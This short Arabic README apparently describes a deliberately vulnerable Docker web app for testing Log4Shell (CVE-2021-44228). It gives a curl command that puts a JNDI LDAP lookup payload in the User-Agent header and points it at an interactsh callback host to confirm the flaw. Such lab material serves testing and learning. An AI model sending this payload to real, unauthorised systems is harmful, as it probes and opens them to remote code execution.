
تطبيق ويب بسيط عرضة لثغرة Log4Shell (CVE-2021-44228)
يسجّل التطبيق ترويسة 'User-Agent'، لذلك يمكنك اختبار الثغرة باستخدام curl وعلى سبيل المثال خدمة interactsh:
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
يجب أن ترى تفاعل DNS على app.interactsh.com.
رابط إلى Docker Hub